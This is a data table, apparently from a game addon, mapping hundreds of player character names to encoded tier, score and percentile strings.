["Bibishuang"] = "UB:157/42%CM:175/17%",
["Devincey"] = "UB:281/38%UM:443/47%",
["Dirtybowl"] = "LB:760/97%LM:964/98%",
["Marrvel"] = "CB:30/1%CM:145/12%",
["Shammy"] = "CT:146/16%EB:668/89%LM:918/95%",
["Waterfortipz"] = "EB:583/77%RM:582/64%",
["Ihealfreely"] = "CB:87/8%UM:253/25%",
["Roflmcsupsup"] = "EB:693/87%EM:902/92%",
["Mattisgay"] = "UM:323/33%",
["Udadu"] = "RB:412/54%EM:741/80%",
["Pezooksz"] = "UT:213/28%EB:649/85%EM:892/92%",
["Sander"] = "RB:482/64%UM:309/32%",
["Yom"] = "LB:749/96%EM:889/92%",
["Janissary"] = "LB:758/95%EM:920/94%",
["Pfizer"] = "EB:708/89%EM:878/90%",
["Lichendross"] = "CB:70/7%CM:115/13%",
["Aezir"] = "RB:483/67%RM:598/66%",
["Sjakxie"] = "UT:112/43%CB:79/9%CM:167/15%",
["Bigcat"] = "UT:120/46%EB:743/94%LM:980/98%",
["Shadowdolt"] = "UM:269/27%",
["Chakka"] = "EB:624/81%EM:802/83%",
["Preast"] = "UM:433/47%",
["Billygibbons"] = "UM:454/46%",
["Polymorphism"] = "ET:595/85%RB:380/71%RM:442/68%",
["Stabotage"] = "EB:640/81%EM:792/82%",
["Emerson"] = "RM:305/50%",
["Adressar"] = "ET:348/83%EB:559/87%EM:681/87%",
["Wewfieh"] = "UM:323/33%",
["Stickup"] = "LB:758/95%LM:947/96%",
["Recov"] = "CT:0/4%EB:620/81%LM:945/95%",
["Dmt"] = "CT:59/20%EB:642/83%EM:896/90%",
["Beefybear"] = "RT:170/61%EB:635/82%LM:972/97%",
["Funked"] = "CT:181/23%LB:754/95%EM:924/94%",
["Candazan"] = "CM:74/10%",
["Xenochaos"] = "UT:295/39%SB:821/99%SM:1029/99%",
["Rmb"] = "UB:381/48%RM:610/65%",
["Poomp"] = "CT:63/12%",
["Hinelle"] = "RT:221/73%EB:538/76%EM:591/92%",
["Killpul"] = "CT:29/7%CB:136/16%CM:149/14%",
["Djowl"] = "RB:487/61%EM:771/81%",
["Focused"] = "EB:711/90%RM:702/74%",
["Hazo"] = "UB:292/37%UM:220/31%",
["Xiaomao"] = "LB:742/96%EM:839/93%",
["Koter"] = "EB:713/90%EM:754/79%",
["Rollindank"] = "CB:92/11%RM:596/64%",
["Fourthreetwo"] = "RB:505/65%RM:700/74%",
["Psydog"] = "RM:457/53%",
["Avaros"] = "UT:300/40%LB:752/95%EM:877/90%",
["Pendrapally"] = "UT:96/34%RB:522/72%RM:610/67%",
["Naanoo"] = "EB:740/93%RM:691/74%",
["Bigdfix"] = "CB:154/20%RM:495/50%",
["Reknop"] = "RB:551/73%EM:518/83%",
["Ryuichi"] = "EB:571/79%EM:709/78%",
["Maowang"] = "RT:184/60%EB:646/88%EM:620/78%",
["Darinka"] = "UB:366/49%UM:135/44%",
["Yumoon"] = "LB:695/95%EM:780/92%",
["Ca"] = "UB:234/30%CM:224/22%",
["Grunkk"] = "CM:78/10%",
["Starlitmagi"] = "RM:205/58%",
["Selvenn"] = "CB:164/21%UM:98/29%",
["Milky"] = "UM:312/31%",
["Progamrstrat"] = "RM:355/58%",
["Seanbud"] = "LB:763/96%EM:839/87%",
["Lokogar"] = "LB:772/97%EM:924/94%",
["Wobbs"] = "CM:134/13%",
["Ucuucu"] = "EB:618/79%RM:607/65%",
["Ninek"] = "EB:680/86%EM:828/86%",
["Airey"] = "RB:527/73%LM:914/95%",
["Xhane"] = "SB:828/99%SM:1028/99%",
["Furythot"] = "UB:262/28%EM:737/78%",
["Boomba"] = "EB:644/91%LM:938/96%",
["Zeroxas"] = "UM:429/43%",
["Amuhnet"] = "SB:835/99%SM:1008/99%",
["Gnombre"] = "RB:539/70%RM:524/54%",
["Calad"] = "EB:739/94%EM:841/89%",
["Stance"] = "EB:738/93%EM:796/83%",
["Noless"] = "EB:641/84%RM:653/72%",
["Urban"] = "RB:572/73%EM:764/80%",
["Frostyaddams"] = "CM:216/21%",
["Khruul"] = "RB:544/72%EM:824/85%",
["Mcfactory"] = "EB:631/85%EM:848/89%",
["Gurthmaster"] = "EB:678/91%EM:776/88%",
["Demonist"] = "EB:638/82%RM:664/69%",
["Basic"] = "UT:116/44%EB:719/92%EM:900/93%",
["Hunger"] = "SB:782/99%LM:938/98%",
["Crowcaller"] = "RB:447/61%RM:549/60%",
["Rugrin"] = "UB:364/43%RM:682/73%",
["Snarebear"] = "EB:685/93%LM:896/96%",
["Kettius"] = "RB:477/63%EM:827/87%",
["Leftee"] = "CB:95/11%CM:152/14%",
["Milee"] = "UM:415/45%",
["Pèrsephone"] = "EB:738/93%LM:969/97%",
["Liquorshlitz"] = "UB:338/42%EM:741/78%",
["Ensuring"] = "LB:729/96%LM:967/98%",
["Abalonia"] = "RB:407/52%RM:543/56%",
["Pyronutblast"] = "CB:98/11%RM:583/64%",
["Totalbodygym"] = "UB:367/46%RM:665/71%",
["Danielson"] = "RB:556/73%EM:822/85%",
["Doncic"] = "CB:30/1%CM:11/16%",
["Rushcow"] = "RM:481/69%",
["Eilrahc"] = "CM:205/19%",
["Hoko"] = "CB:69/8%RM:491/52%",
["Frozenbread"] = "UM:375/40%",
["Tiddyciddy"] = "EB:661/85%EM:820/85%",
["Soulghast"] = "CB:42/4%CM:238/24%",
["Sonioub"] = "CM:27/0%",
["Epiclucky"] = "EB:749/94%EM:915/94%",
["Aoligeii"] = "EB:603/79%EM:752/81%",
["Gflwjjnr"] = "RB:401/53%RM:553/61%",
["Woodshock"] = "CB:90/8%CM:71/5%",
["Rhee"] = "CM:74/9%",
["Cowplay"] = "CM:237/23%",
["Azoc"] = "CM:174/17%",
["Nainiuniu"] = "EB:718/94%LM:887/95%",
["Thesephiroth"] = "CM:149/14%",
["Knale"] = "UM:296/30%",
["Reconlobster"] = "LB:768/96%LM:960/97%",
["Labraid"] = "EB:649/85%EM:903/93%",
["Vandragon"] = "RB:540/69%RM:613/66%",
["Azrine"] = "EB:717/90%EM:782/82%",
["Mercimax"] = "UB:249/44%CM:239/24%",
["Madali"] = "CM:34/2%",
["Igniubl"] = "UB:216/27%",
["Toastjob"] = "EB:597/76%RM:533/57%",
["Akunis"] = "EM:886/91%",
["Odboc"] = "CB:122/12%RM:633/70%",
["Commandzero"] = "UB:302/41%RM:308/68%",
["Ashoka"] = "RB:473/63%EM:735/78%",
["Higgus"] = "RB:437/60%EM:750/81%",
["Necrogue"] = "EB:675/85%RM:694/73%",
["Benchwarmer"] = "EB:524/82%EM:564/83%",
["Gimilly"] = "CM:29/0%",
["Damert"] = "CB:151/16%CM:112/23%",
["Thisguyfuqs"] = "RB:409/53%EM:800/83%",
["Lunge"] = "RB:454/57%EM:722/77%",
["Daltzi"] = "EB:687/87%EM:850/87%",
["Istral"] = "LB:783/98%SM:1003/99%",
["Braj"] = "EB:685/87%EM:839/87%",
["Stonk"] = "RM:663/71%",
["Citnark"] = "CB:136/16%UM:362/42%",
["Granville"] = "EB:628/86%EM:851/90%",
["Justreroll"] = "EB:686/89%EM:871/91%",
["Kkung"] = "LB:747/97%EM:815/87%",
["Talihm"] = "EB:658/90%EM:722/79%",
["Yourturn"] = "CB:183/19%CM:151/16%",
["Angrybearz"] = "LB:782/98%LM:969/97%",
["Sgtdicks"] = "UB:344/46%RM:640/71%",
["Sòuleater"] = "RM:458/64%",
["Handybarz"] = "EB:723/91%EM:710/75%",
["Rizeuplightz"] = "UT:139/45%EB:707/93%EM:883/92%",
["Ymm"] = "UM:410/41%",
["Luckfatd"] = "RB:409/55%UM:285/36%",
["Pallaton"] = "EB:713/93%EM:831/91%",
["Womens"] = "RB:496/63%EM:723/77%",
["Willysmasher"] = "EB:638/81%RM:451/66%",
["Lilwavy"] = "CM:157/14%",
["Mackstabby"] = "EB:711/89%EM:800/83%",
["Filth"] = "RM:577/52%",
["Swaggygirl"] = "CM:92/8%",
["Naisini"] = "RB:509/70%RM:604/67%",
["Nanamì"] = "EB:669/86%EM:897/92%",
["Kahboom"] = "RB:496/66%RM:647/71%",
["Mftcy"] = "RB:482/61%EM:884/91%",
["Litter"] = "RB:389/73%RM:643/71%",
["Iynch"] = "EB:694/87%EM:777/82%",
["Dafonze"] = "EB:475/75%EM:663/82%",
["Dayhlia"] = "LB:749/97%EM:882/93%",
["Vuntrefire"] = "EB:745/94%EM:919/94%",
["Xiaobudian"] = "CM:123/12%",
["Givemeaface"] = "CM:121/12%",
["Rozal"] = "EB:575/80%EM:881/93%",
["Everett"] = "EB:718/90%EM:820/85%",
["Littlejmac"] = "EB:671/85%EM:919/94%",
["Squeex"] = "CB:198/21%UM:370/37%",
["Seawench"] = "EM:843/90%",
["Tggleswealth"] = "EB:697/90%EM:877/91%",
["Elunari"] = "LB:753/95%EM:925/94%",
["Jerì"] = "RT:531/67%UB:195/47%UM:375/40%",
["Valien"] = "CM:114/9%",
["Zelshraz"] = "RM:478/52%",
["Bigbeard"] = "RM:539/59%",
["Patronas"] = "UM:482/49%",
["Stealthcode"] = "UM:291/29%",
["Enricher"] = "RB:463/61%RM:681/74%",
["Zlow"] = "LB:764/96%LM:944/96%",
["Primeribeyes"] = "RM:581/64%",
["Rogueisslave"] = "LB:766/96%LM:946/96%",
["Yaksun"] = "RB:411/56%EM:833/90%",
["Mcdonald"] = "UB:348/45%RM:569/61%",
["Twitchshabom"] = "LB:762/98%SM:984/99%",
["Drub"] = "LB:720/96%LM:878/96%",
["Zagin"] = "CM:46/17%",
["Christiné"] = "EB:713/90%EM:863/89%",
["Irrelephant"] = "EB:603/77%CM:227/23%",
["Dunkle"] = "EB:725/94%EM:896/94%",
["Chrons"] = "EB:567/75%EM:802/85%",
["Bearqq"] = "EB:634/80%EM:723/77%",
["Frozenpizza"] = "UM:275/28%",
["Maweifish"] = "EB:545/75%EM:771/83%",
["Janghee"] = "RB:126/51%RM:481/71%",
["Khazzan"] = "UB:290/32%EM:910/91%",
["Stahpdots"] = "UB:253/31%UM:375/38%",
["Braxy"] = "RB:453/59%EM:773/81%",
["Nightside"] = "LB:780/97%LM:944/95%",
["Monam"] = "CB:62/5%RM:602/66%",
["Pyrogud"] = "UM:257/26%",
["Shadowhorny"] = "UB:347/44%RM:517/53%",
["Nezah"] = "UM:262/26%",
["Gruhngus"] = "CB:118/13%RM:686/73%",
["Fartboi"] = "CM:56/4%",
["Kerfuffle"] = "UB:382/46%RM:527/56%",
["Cownan"] = "RM:530/56%",
["Rp"] = "RB:420/51%RM:556/59%",
["Légênd"] = "UB:305/39%RM:499/55%",
["Superwontank"] = "RM:502/53%",
["Thiassi"] = "CM:121/10%",
["Lecuck"] = "CB:168/20%RM:644/71%",
["Angelabeibei"] = "UM:342/34%",
["Huluwa"] = "RB:391/50%RM:637/68%",
["Atemp"] = "CT:25/0%UB:125/33%RM:643/71%",
["Macabrely"] = "CB:84/8%RM:457/50%",
["Wilhelmwundt"] = "UB:104/44%EM:558/75%",
["Gregglelock"] = "CM:111/11%",
["Grimgunner"] = "RB:388/50%UM:261/25%",
["Unkempt"] = "UB:266/34%EM:723/79%",
["Lîfe"] = "SB:796/99%SM:990/99%",
["Usdamoocow"] = "RB:390/53%RM:616/68%",
["Smallmike"] = "EB:718/90%EM:911/93%",
["Dotsndonuts"] = "EB:656/90%EM:849/93%",
["Hoeser"] = "UT:244/32%EB:643/84%EM:892/92%",
["Templeos"] = "EB:681/94%LM:892/96%",
["Clodius"] = "RB:432/59%EM:677/75%",
["Queez"] = "CM:76/6%",
["Baski"] = "ET:209/87%EB:560/85%EM:704/87%",
["Spartz"] = "EB:596/82%EM:818/87%",
["Huntresspro"] = "EB:602/79%EM:894/91%",
["Galloway"] = "UM:85/28%",
["Deathmuffin"] = "RB:555/71%EM:820/91%",
["Eymon"] = "UB:276/38%EM:790/82%",
["Gorefury"] = "RM:399/58%",
["Darksnow"] = "UB:286/36%EM:712/75%",
["Zafwa"] = "RB:514/65%EM:654/82%",
["Tongo"] = "RB:541/71%RM:714/74%",
["Evilsalt"] = "UM:102/42%",
["Ohherro"] = "LB:724/96%SM:991/99%",
["Badbih"] = "EB:615/78%EM:865/89%",
["Bluntstubs"] = "EB:700/88%EM:787/82%",
["Diegoshifts"] = "EB:685/92%EM:819/88%",
["Dragonstrike"] = "EB:616/78%EM:796/83%",
["Anathemo"] = "CT:64/8%CB:57/6%RM:557/57%",
["Habriston"] = "CM:115/10%",
["Vyndriel"] = "RB:175/56%RM:474/74%",
["Falcorion"] = "CB:34/2%CM:132/12%",
["Bookeld"] = "RB:437/57%RM:614/65%",
["Kylecmage"] = "EB:606/80%EM:849/89%",
["Phokit"] = "EB:640/82%EM:788/82%",
["Fearinoculum"] = "UM:91/28%",
["Laplace"] = "EB:609/79%EM:751/78%",
["Distracting"] = "CB:42/8%RM:260/57%",
["Neri"] = "CB:175/21%",
["Aak"] = "CB:1/0%",
["Chadgar"] = "LT:766/97%LB:776/97%LM:947/95%",
["Jefferson"] = "LB:774/97%LM:937/96%",
["Kazusa"] = "RM:589/62%",
["Obamatron"] = "UT:318/43%EB:705/90%EM:900/92%",
["Stargazer"] = "CB:102/12%UM:410/44%",
["Zannex"] = "RB:512/71%EM:456/81%",
["Necrophos"] = "EB:551/77%EM:820/89%",
["Kashiri"] = "CM:201/19%",
["Missmoogoo"] = "RB:491/73%EM:700/84%",
["Valentina"] = "CB:27/0%UM:344/36%",
["Friarjohn"] = "RM:307/58%",
["Trukss"] = "CB:65/8%RM:265/67%",
["Nitriss"] = "UT:301/39%LB:719/96%EM:844/91%",
["Mexmago"] = "RM:512/56%",
["Watta"] = "ET:290/84%EB:602/79%EM:798/85%",
["Dizz"] = "UB:296/39%RM:589/65%",
["Bobloblaw"] = "UM:362/36%",
["Squanchay"] = "CT:73/6%EB:615/84%EM:771/83%",
["Espur"] = "RM:216/56%",
["Zanaki"] = "UB:259/33%UM:333/35%",
["Hinoki"] = "RM:648/71%",
["Spadie"] = "UM:239/29%",
["Ercz"] = "LB:765/96%EM:896/93%",
["Darkk"] = "UB:299/36%CM:155/15%",
["Byebye"] = "EB:744/93%EM:932/93%",
["Slicing"] = "LB:740/95%EM:904/90%",
["Locksta"] = "EB:620/80%EM:801/83%",
["Earmuffs"] = "EM:839/87%",
["Mkflurry"] = "CM:203/20%",
["Delfuego"] = "EB:615/81%EM:814/86%",
["Coalminer"] = "RM:235/57%",
["Shaundra"] = "EB:552/76%EM:735/80%",
["Hazrds"] = "UM:417/47%",
["Orazella"] = "EB:484/80%EM:610/80%",
["Jonwickk"] = "RM:631/67%",
["Fyfy"] = "CM:235/23%",
["Crystaleyes"] = "EB:577/76%EM:813/86%",
["Advan"] = "CM:83/7%",
["Whitehand"] = "EB:715/91%EM:912/94%",
["Berniebro"] = "EB:680/87%EM:884/90%",
["Yox"] = "EB:689/91%EM:900/94%",
["Orcski"] = "RB:439/70%EM:685/81%",
["Bonalisa"] = "EB:727/92%EM:880/90%",
["Slo"] = "RB:461/59%UM:461/49%",
["Melveny"] = "EB:673/92%EM:822/91%",
["Visgar"] = "LB:770/96%LM:967/97%",
["Varax"] = "EB:749/94%EM:876/90%",
["Huntizzle"] = "EB:751/94%EM:903/92%",
["Fourleaf"] = "LB:777/97%EM:904/93%",
["Li"] = "SB:800/99%SM:979/99%",
["Lowbrow"] = "CB:27/0%UM:31/26%",
["Josiette"] = "EB:659/89%EM:765/83%",
["Avakai"] = "EB:623/79%EM:703/75%",
["Powerhour"] = "EB:625/86%LM:951/97%",
["Wildmonk"] = "CM:48/4%",
["Pungpung"] = "LB:754/95%EM:888/91%",
["Flicker"] = "EB:541/75%LM:929/96%",
["Marisette"] = "LB:767/97%LM:902/96%",
["Icyflows"] = "LB:771/97%LM:969/98%",
["Sadkot"] = "RB:514/71%EM:882/93%",
["Cinthya"] = "RB:426/55%EM:723/76%",
["Leopard"] = "RB:468/61%EM:758/80%",
["Decro"] = "CM:241/24%",
["Fapy"] = "RB:508/70%RM:622/68%",
["Dangerdavid"] = "RB:389/50%UM:336/34%",
["Lightsoul"] = "CB:124/15%CM:147/15%",
["Fishsauce"] = "LB:783/98%SM:995/99%",
["Sippinsteve"] = "EB:649/84%EM:748/79%",
["Pekingduck"] = "EB:599/83%EM:783/85%",
["Mimihaoda"] = "CM:200/19%",
["Poisonetta"] = "EB:595/81%EM:713/78%",
["Compound"] = "CT:28/1%RM:686/73%",
["Muzzleloader"] = "CM:236/22%",
["Jubbabubba"] = "UM:387/39%",
["Camigail"] = "UM:347/36%",
["Klondikê"] = "EB:733/92%LM:937/95%",
["Stablemaster"] = "UB:266/33%UM:244/29%",
["Myspot"] = "CM:27/0%",
["Jmanb"] = "EB:680/87%EM:846/87%",
["Feare"] = "RB:495/63%UM:463/48%",
["Suzëttë"] = "EB:554/77%EM:682/75%",
["Dirtt"] = "ET:618/77%SB:808/99%LM:951/97%",
["Eilistraee"] = "EB:611/85%EM:803/87%",
["Veliar"] = "CM:36/2%",
["Wagepeace"] = "EB:714/90%EM:894/92%",
["Spikespiegel"] = "CB:63/7%RM:580/62%",
["Puppydogeyes"] = "EB:545/76%RM:600/66%",
["Khrom"] = "RB:499/66%EM:715/76%",
["Manrybeast"] = "RB:476/60%UM:302/30%",
["Gitpull"] = "CB:76/9%RM:555/57%",
["Emö"] = "EB:704/88%RM:516/55%",
["Yuanjia"] = "EB:593/84%EM:872/94%",
["Picsforports"] = "EB:671/87%EM:886/92%",
["Derox"] = "UB:238/25%EM:818/85%",
["Poofeazy"] = "RB:412/52%RM:572/61%",
["Frostara"] = "RB:440/58%RM:527/58%",
["Truump"] = "CM:168/24%",
["Tidox"] = "RB:410/58%EM:713/78%",
["Frostybaby"] = "UM:470/49%",
["Junglebee"] = "CM:182/17%",
["Sylra"] = "CB:80/9%CM:189/19%",
["Hotlunch"] = "EB:699/90%EM:929/94%",
["Nelo"] = "RB:479/62%RM:524/54%",
["Codykins"] = "EB:716/91%LM:944/96%",
["Jeeze"] = "UB:276/30%RM:589/63%",
["Notsicarios"] = "UM:274/47%",
["Krismage"] = "CM:75/6%",
["Hyrick"] = "UT:122/27%LB:738/95%LM:892/96%",
["Fhud"] = "CB:151/19%UM:404/45%",
["Donutshop"] = "EB:593/78%EM:802/85%",
["Devilishjoy"] = "EB:650/82%RM:690/73%",
["Nimbell"] = "CB:118/14%RM:674/72%",
["Kogigodx"] = "EB:710/94%SM:995/99%",
["Steener"] = "ET:652/85%LB:786/98%SM:1009/99%",
["Masmas"] = "CM:75/6%",
["Gnone"] = "EB:713/90%EM:915/93%",
["Kenzzie"] = "RM:535/60%",
["Uzrip"] = "UB:117/32%UM:406/43%",
["Jacksky"] = "CB:153/19%UM:289/30%",
["Pornhublive"] = "UB:318/41%UM:409/44%",
["Evertonia"] = "LB:728/96%LM:945/97%",
["Jaytwo"] = "EB:595/82%LM:958/98%",
["Pyropom"] = "RM:609/67%",
["Stankydanky"] = "LB:771/97%LM:980/98%",
["Easyfrosty"] = "RB:451/65%UM:254/31%",
["Pawned"] = "CB:116/14%CM:71/6%",
["Dreamhackk"] = "UB:287/38%RM:591/65%",
["Onebadlarry"] = "RB:487/68%RM:608/67%",
["Dirtylilhord"] = "EB:607/84%EM:855/90%",
["Trakapwn"] = "EB:701/89%EM:932/94%",
["Dwarvenkilla"] = "EB:684/92%LM:938/96%",
["Dalmation"] = "RB:377/51%RM:660/73%",
["Avistrash"] = "RM:457/50%",
["Sostoned"] = "LB:770/97%LM:936/95%",
["Spacelace"] = "EB:615/85%EM:876/93%",
["Spookyt"] = "UB:220/27%RM:445/72%",
["Deveus"] = "EB:652/84%EM:792/82%",
["Tryhards"] = "RB:520/66%EM:716/76%",
["Sneakybsns"] = "UT:323/41%EB:668/84%LM:960/97%",
["Gimely"] = "EB:636/80%EM:742/78%",
["Sabrewolf"] = "CB:97/9%CM:50/3%",
["Widds"] = "EB:683/88%EM:899/93%",
["Yesyes"] = "EB:635/87%EM:821/89%",
["Chobap"] = "RB:420/57%RM:601/66%",
["Ccung"] = "EB:636/80%EM:845/87%",
["Martt"] = "UM:332/35%",
["Damage"] = "EB:654/84%EM:877/90%",
["Smokedogg"] = "EB:692/93%EM:749/89%",
["Evilryu"] = "SB:878/99%SM:1087/99%",
["Olissice"] = "CT:37/6%CB:87/8%CM:125/10%",
["Casualdruid"] = "SB:914/99%SM:1037/99%",
["Tafson"] = "SB:847/99%SM:1007/99%",
["Tomboe"] = "ET:743/94%LB:793/98%LM:984/98%",
["Gurfinkle"] = "LB:755/95%EM:829/88%",
["Cosm"] = "SB:818/99%SM:1039/99%",
["Coconutsucks"] = "RB:555/71%RM:668/71%",
["Outlastme"] = "RT:181/64%EB:656/83%EM:704/75%",
["Jikii"] = "EB:676/85%RM:689/73%",
["Mugzin"] = "EB:618/85%EM:809/88%",
["Narçan"] = "LB:768/96%LM:964/97%",
["Gambino"] = "LB:755/96%LM:895/96%",
["Gerryatrick"] = "EB:684/92%EM:899/94%",
["Bullwrinkle"] = "LB:754/95%LM:929/96%",
["Sheezle"] = "EB:742/93%LM:930/95%",
["Iceagency"] = "CB:49/5%CM:187/18%",
["Vandetti"] = "CT:0/0%UM:377/38%",
["Stinkbolt"] = "RB:537/71%EM:721/78%",
["Tzvetan"] = "LB:751/95%EM:892/92%",
["Cooterdangle"] = "EB:721/93%LM:949/96%",
["It"] = "SB:824/99%SM:1038/99%",
["Reflexx"] = "LB:731/96%SM:988/99%",
["Functiion"] = "SB:835/99%SM:997/99%",
["Aevum"] = "LB:772/97%EM:800/92%",
["Hotspice"] = "LB:763/97%LM:947/98%",
["Maurth"] = "RM:615/66%",
["Onenatty"] = "UM:369/37%",
["Gabriele"] = "CB:37/2%CM:164/15%",
["Tittles"] = "RM:461/50%",
["Astronoid"] = "RB:538/73%EM:817/85%",
["Jadior"] = "LB:755/98%LM:909/95%",
["Shaorc"] = "CB:125/14%RM:524/58%",
["Gohm"] = "LB:732/96%LM:974/98%",
["Voodoodoll"] = "EB:714/91%LM:938/96%",
["Skipintro"] = "RB:518/72%EM:899/93%",
["Seizer"] = "UM:400/42%",
["Warlokhölmes"] = "RB:427/55%RM:573/59%",
["Poofgirl"] = "CM:98/8%",
["Shnookumz"] = "EB:716/91%EM:798/85%",
["Golddiggerr"] = "EB:669/87%RM:675/74%",
["Spaceghóst"] = "EB:742/93%LM:944/96%",
["Imperative"] = "EB:658/83%EM:910/93%",
["Shadieb"] = "RB:491/68%RM:617/69%",
["Flargen"] = "EB:529/80%EM:729/86%",
["Ceeyah"] = "RM:669/71%",
["Roflbot"] = "EM:760/82%",
["Suitcased"] = "RM:411/65%",
["Pirogi"] = "UM:309/32%",
["Outprayëd"] = "CM:47/2%",
["Fuhrery"] = "EM:714/83%",
["Brond"] = "RB:404/53%RM:538/59%",
["Superdog"] = "CM:195/19%",
["Sazem"] = "EB:709/90%RM:610/63%",
["Buzzie"] = "CT:34/10%EB:683/88%EM:861/90%",
["Mahx"] = "CM:133/13%",
["Jonathann"] = "RM:745/71%",
["Tungii"] = "UB:311/35%RM:551/59%",
["Dabeefcake"] = "EB:745/93%LM:957/97%",
["Voronyx"] = "LB:761/96%SM:983/99%",
["Shtorfy"] = "EB:588/81%UM:401/43%",
["Scaryz"] = "EB:710/90%EM:725/75%",
["Scoop"] = "LT:832/96%SB:736/99%LM:957/98%",
["Chippy"] = "EB:637/86%EM:715/78%",
["Bignasty"] = "RB:458/69%EM:708/85%",
["Bumboclaat"] = "EB:587/82%EM:779/89%",
["Omfgdan"] = "EB:603/83%EM:807/87%",
["Greeboo"] = "UB:216/27%RM:550/57%",
["Ablaze"] = "RM:257/65%",
["Gunjamin"] = "EB:586/75%EM:890/88%",
["Cleudisvalda"] = "RM:313/63%",
["Casualjoo"] = "LT:767/97%EB:552/93%EM:728/84%",
["Missandeii"] = "CB:123/15%UM:372/39%",
["Ibash"] = "CM:174/18%",
["Deckhand"] = "UB:369/46%RM:583/62%",
["Zylis"] = "RM:461/52%",
["Dezzx"] = "CT:45/5%CB:183/23%LM:944/95%",
["Dectx"] = "CT:57/4%RB:531/74%EM:740/81%",
["Holykk"] = "UB:280/34%EM:732/77%",
["Lagatha"] = "CT:2/3%CM:1/1%",
["Orcname"] = "CT:4/11%CB:2/2%UM:175/38%",
["Krieghoff"] = "EB:631/80%EM:855/88%",
["Waifuirl"] = "UT:219/28%EB:725/92%EM:900/93%",
["Erguotou"] = "CB:187/23%UM:326/33%",
["Saltykale"] = "RB:403/53%UM:251/25%",
["Persèphone"] = "RB:423/57%RM:694/72%",
["Realmqt"] = "RM:573/63%",
["Docinabox"] = "CM:145/12%",
["Tsar"] = "LB:763/96%LM:946/95%",
["Magnifier"] = "EB:615/81%EM:685/75%",
["Konglish"] = "RT:189/66%EB:657/85%EM:814/86%",
["Zapperboi"] = "UB:309/41%RM:606/67%",
["Bootscoot"] = "CM:129/18%",
["Quannchi"] = "CB:85/10%",
["Gorolash"] = "CB:37/3%",
["Xavierra"] = "RB:562/72%UM:463/49%",
["Younyoun"] = "EB:672/87%EM:802/85%",
["Mandalorc"] = "CM:12/2%",
["Teichbob"] = "CM:23/5%",
["Icebuffalo"] = "RB:566/72%EM:751/87%",
["Tiandog"] = "CB:48/10%",
["Horuma"] = "CM:131/18%",
["Ártur"] = "EB:718/92%EM:878/91%",
["Clucku"] = "CB:96/12%CM:133/12%",
["Prozura"] = "CB:196/24%RM:548/58%",
["Hyskoa"] = "EB:603/80%EM:785/83%",
["Daneru"] = "CB:124/16%UM:228/28%",
["Itzpapalotl"] = "UM:93/35%",
["Widgett"] = "RM:565/62%",
["Gingermanlet"] = "CB:39/2%CM:117/16%",
["Critnyspears"] = "EB:703/88%EM:884/90%",
["Korrh"] = "LB:792/98%SM:989/99%",
["Cadaceus"] = "UM:333/35%",
["Sigfrid"] = "LB:785/98%LM:956/97%",
["Provoked"] = "RM:545/60%",
["Gandàlf"] = "EB:694/87%EM:730/77%",
["Kloogy"] = "EB:700/88%EM:933/93%",
["Pbukncur"] = "UM:447/48%",
["Medallion"] = "RB:494/66%EM:784/84%",
["Zute"] = "RB:511/68%EM:716/78%",
["Khomha"] = "EB:625/86%EM:734/80%",
["Quaalud"] = "UB:207/25%UM:340/35%",
["Saddan"] = "UB:256/33%RM:568/63%",
["Blackhov"] = "UB:236/25%UM:405/41%",
["Boa"] = "RB:260/62%RM:638/70%",
["Gordons"] = "CM:121/11%",
["Arizonatea"] = "CM:130/14%",
["Spergdaddy"] = "EB:686/86%EM:868/89%",
["Eddon"] = "UM:477/49%",
["Helianthous"] = "UB:351/41%UM:329/33%",
["Mentoss"] = "SB:806/99%SM:1019/99%",
["Hugoballs"] = "EB:688/93%EM:846/91%",
["Frostix"] = "UB:247/31%UM:335/35%",
["Tybarion"] = "EB:575/81%EM:822/91%",
["Besokuse"] = "CB:111/13%CM:123/11%",
["Letitbe"] = "RB:397/52%RM:574/61%",
["Millerlife"] = "UM:182/27%",
["Millerzz"] = "CB:87/8%UM:422/45%",
["Nephex"] = "CM:209/21%",
["Bearqo"] = "UB:258/33%RM:559/62%",
["Ayasa"] = "LB:766/96%EM:894/91%",
["Leonardt"] = "EB:601/83%RM:624/69%",
["Buttsinspace"] = "EB:649/82%RM:611/58%",
["Zeber"] = "EB:601/78%RM:682/72%",
["Ïçeçreäm"] = "CB:35/3%CM:141/13%",
["Sancudo"] = "RB:480/60%EM:668/83%",
["Worldstarr"] = "CM:113/15%",
["Flask"] = "CM:115/10%",
["Spicychili"] = "EM:812/90%",
["Icedmoca"] = "CB:148/16%RM:640/68%",
["Reconmage"] = "UM:336/35%",
["Citadelle"] = "CM:161/14%",
["Maco"] = "EM:747/82%",
["Hanufish"] = "CM:136/12%",
["Danti"] = "EM:759/82%",
["Emert"] = "RB:508/70%RM:653/72%",
["Sarmia"] = "EB:683/93%EM:876/93%",
["Slyslade"] = "LB:770/98%LM:953/97%",
["Betterthenu"] = "EB:712/89%EM:865/89%",
["Loomii"] = "LB:757/98%EM:907/94%",
["Carltonganks"] = "CB:201/21%UM:292/29%",
["Nauka"] = "RB:460/74%EM:663/82%",
["Gimmetehloot"] = "EB:614/80%RM:643/67%",
["Saintsif"] = "UB:281/36%EM:819/88%",
["Tazdeengoh"] = "EB:615/84%EM:896/93%",
["Ginru"] = "LB:783/98%LM:954/95%",
["Boostogoosto"] = "CM:96/8%",
["Superduper"] = "EB:712/89%EM:906/93%",
["Stealthypoo"] = "CM:35/2%",
["Doofydiddles"] = "CB:53/4%EM:764/83%",
["Crustymaggot"] = "CB:65/5%RM:588/65%",
["Docfreeze"] = "UB:300/38%UM:395/42%",
["Dadjudicator"] = "CB:137/17%RM:616/68%",
["Ozmos"] = "RM:659/72%",
["Cheezburger"] = "RM:434/62%",
["Aesoul"] = "CB:37/4%RM:586/63%",
["Mulu"] = "RM:171/51%",
["Lexdi"] = "RB:430/57%RM:474/52%",
["Ddmfs"] = "EB:625/86%RM:434/51%",
["Tazdingho"] = "RM:661/72%",
["Royalty"] = "LB:756/96%LM:894/96%",
["Purplehazeup"] = "EB:709/90%EM:880/91%",
["Dkzoneever"] = "RB:496/65%EM:880/89%",
["Wewaxin"] = "ET:678/88%LB:788/98%EM:898/93%",
["Geoffepsteem"] = "CM:27/0%",
["Siliconelube"] = "UM:334/35%",
["Rizzledrip"] = "CB:41/4%RM:548/59%",
["Bangedybang"] = "EB:651/84%UM:275/26%",
["Zzd"] = "UM:323/33%",
["Stabjab"] = "EB:682/86%EM:820/85%",
["Sneakyjoe"] = "UB:305/37%RM:493/52%",
["Notume"] = "RM:499/53%",
["Fearnut"] = "CT:39/11%RB:516/71%EM:830/89%",
["Crazycajun"] = "UB:320/42%RM:659/73%",
